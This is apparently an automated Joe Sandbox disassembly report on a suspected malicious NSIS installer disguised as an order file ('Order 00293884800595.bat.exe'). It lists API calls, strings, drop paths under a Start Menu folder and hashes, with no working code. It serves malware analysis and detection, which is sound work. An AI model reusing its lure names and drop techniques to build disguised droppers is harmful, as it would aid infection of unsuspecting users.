Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
String ID: "$"C:\Users\user\Desktop\Order 00293884800595.bat.exe"$1033$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne$C:\Users\user\Desktop$C:\Users\user\Desktop\Order 00293884800595.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K@v$humpende Setup$~nsu%X.tmp
API String ID: 2956269667-3936847705
Opcode ID: 7d50073d3b4601cb2fc23eb0cc30a51c03b07205e862937f6a4874c8b30ec542
Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
Opcode Fuzzy Hash: 7d50073d3b4601cb2fc23eb0cc30a51c03b07205e862937f6a4874c8b30ec542
Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E

Function 0040550F Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040556E
GetDlgItem.USER32(?,000003EE), ref: 0040557D
GetClientRect.USER32(?,?), ref: 004055BA
GetSystemMetrics.USER32(00000002), ref: 004055C1
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
ShowWindow.USER32(?,00000008), ref: 0040565D
GetDlgItem.USER32(?,000003EC), ref: 0040567E
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
GetDlgItem.USER32(?,000003F8), ref: 0040558C

Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370

GetDlgItem.USER32(?,000003EC), ref: 004056CF
CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004056E4
ShowWindow.USER32(00000000), ref: 00405707
ShowWindow.USER32(?,00000008), ref: 0040570E
ShowWindow.USER32(00000008), ref: 00405754
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
CreatePopupMenu.USER32 ref: 00405799
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
GetWindowRect.USER32(?,000000FF), ref: 004057CE
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
OpenClipboard.USER32(00000000), ref: 00405833
EmptyClipboard.USER32 ref: 00405839
GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
GlobalLock.KERNEL32(00000000), ref: 0040584C
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
GlobalUnlock.KERNEL32(00000000), ref: 00405879
SetClipboardData.USER32(00000001,00000000), ref: 00405884
CloseClipboard.USER32 ref: 0040588A

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID:
API String ID: 4154960007-0
Opcode ID: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
Opcode Fuzzy Hash: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68

Function 6CA51B28 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA512A5: GlobalAlloc.KERNEL32(00000040,6CA512C3,?,6CA5135F,-6CA5504B,6CA511C0,-000000A0), ref: 6CA512AD

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6CA51C54
lstrcpyA.KERNEL32(00000008,?), ref: 6CA51C9C
lstrcpyA.KERNEL32(00000408,?), ref: 6CA51CA6
GlobalFree.KERNEL32(00000000), ref: 6CA51CB9
GlobalFree.KERNEL32(?), ref: 6CA51D99
GlobalFree.KERNEL32(?), ref: 6CA51D9E
GlobalFree.KERNEL32(?), ref: 6CA51DA3
GlobalFree.KERNEL32(00000000), ref: 6CA51F8A
lstrcpyA.KERNEL32(?,?), ref: 6CA52128
GetModuleHandleA.KERNEL32(00000008), ref: 6CA521A4
LoadLibraryA.KERNEL32(00000008), ref: 6CA521B5
GetProcAddress.KERNEL32(?,?), ref: 6CA5220E
lstrlenA.KERNEL32(00000408), ref: 6CA52228

Memory Dump Source

Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true

Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: ca57531aab50ff558fc31a138f62b18f8996fe2b8f1a25dc6d5b11603cf7a9b0
Instruction ID: 29a01d155cd712b1d27e842717ae14666467a239058c4b163a3c105648b17a66
Opcode Fuzzy Hash: ca57531aab50ff558fc31a138f62b18f8996fe2b8f1a25dc6d5b11603cf7a9b0
Instruction Fuzzy Hash: 5D229071E45206DEDB108FA8C4847FEBBF4FB05309FA4C62ED265A2A80D77499E5CB50

Function 00405A4F Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405A78
lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405AC0
lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405AE1
lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405AE7
FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405AF8
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
FindClose.KERNEL32(00000000), ref: 00405BB6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5C
\*.*, xrefs: 00405ABA
"C:\Users\user\Desktop\Order 00293884800595.bat.exe", xrefs: 00405A58

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Order 00293884800595.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3404254380
Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE

Function 00406620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(763F3410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
FindClose.KERNEL32(00000000), ref: 00406637

Strings

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp, xrefs: 00406620

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp
API String ID: 2295610775-4121408785
Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC

Function 00403E33 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
ShowWindow.USER32(?), ref: 00403E8F
GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
ShowWindow.USER32(?,00000004), ref: 00403EBA
DestroyWindow.USER32 ref: 00403ECE
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
GetDlgItem.USER32(?,?), ref: 00403F06
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
IsWindowEnabled.USER32(00000000), ref: 00403F21
GetDlgItem.USER32(?,00000001), ref: 00403FCC
GetDlgItem.USER32(?,00000002), ref: 00403FD6
SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
GetDlgItem.USER32(?,00000003), ref: 004040E7
ShowWindow.USER32(00000000,?), ref: 00404108
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
EnableWindow.USER32(?,?), ref: 00404135
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
EnableMenuItem.USER32(00000000), ref: 00404152
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
SetWindowTextA.USER32(?,0042A488), ref: 004041B6
ShowWindow.USER32(?,0000000A), ref: 004042EA

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
Opcode Fuzzy Hash: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D

Function 00403A96 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2

lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,763F3410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",0000000A,0000000C), ref: 00403B11
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,763F3410), ref: 00403B86
lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",0000000A,0000000C), ref: 00403BA4
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes), ref: 00403BED

Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8

RegisterClassA.USER32(0042E7C0), ref: 00403C2A
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",0000000A,0000000C), ref: 00403CAD
GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
RegisterClassA.USER32(0042E7C0), ref: 00403CEF
DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00403ACA
Call, xrefs: 00403B54, 00403B5C, 00403B69, 00403BB3, 00403BB9
RichEdit20A, xrefs: 00403CD1, 00403CD7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes, xrefs: 00403B20, 00403B28, 00403BC0, 00403BC6, 00403BD6
C:\Users\user\AppData\Local\Temp\, xrefs: 00403A9B
_Nb, xrefs: 00403C09, 00403C71
"C:\Users\user\Desktop\Order 00293884800595.bat.exe", xrefs: 00403A99
.DEFAULT\Control Panel\International, xrefs: 00403AFC
RichEd32, xrefs: 00403CC1
1033, xrefs: 00403AB6, 00403B0C
RichEd20, xrefs: 00403CB3
.exe, xrefs: 00403B93
RichEdit, xrefs: 00403CE0

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Order 00293884800595.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-769340183
Opcode ID: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
Opcode Fuzzy Hash: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D

Function 00402F31 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F42
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Order 00293884800595.bat.exe,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E

Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order 00293884800595.bat.exe,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
GlobalAlloc.KERNELBASE(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
C:\Users\user\Desktop\Order 00293884800595.bat.exe, xrefs: 00402F48, 00402F57, 00402F6B, 00402F8B
Error launching installer, xrefs: 00402F81
Null, xrefs: 00403028
C:\Users\user\AppData\Local\Temp\, xrefs: 00402F38
8TA, xrefs: 00402FBF
Inst, xrefs: 00403016
C:\Users\user\Desktop, xrefs: 00402F8C, 00402F91, 00402F97
soft, xrefs: 0040301F
"C:\Users\user\Desktop\Order 00293884800595.bat.exe", xrefs: 00402F37

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Order 00293884800595.bat.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Order 00293884800595.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1323520412
Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D

Function 00406320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 208
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406452
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00000000), ref: 00406468
SHGetPathFromIDListA.SHELL32(00000000,Call,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000), ref: 004064C7
CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000), ref: 004064D0
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000), ref: 004064F4
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00000000,00424440,763F23A0), ref: 00406546

Strings

T@, xrefs: 0040647E, 0040649E, 004064B5
Call, xrefs: 00406347, 00406421, 0040643C, 00406451, 00406467, 0040649B, 004064C5, 004064F3, 004064F9, 00406511, 00406524, 0040653F, 00406545, 00406550, 0040657A
G8g, xrefs: 0040632D
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004064EE
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406423
Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll, xrefs: 0040634F

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: T@$Call$G8g$Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-4009566976
Opcode ID: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
Opcode Fuzzy Hash: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D

Function 0040177E Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

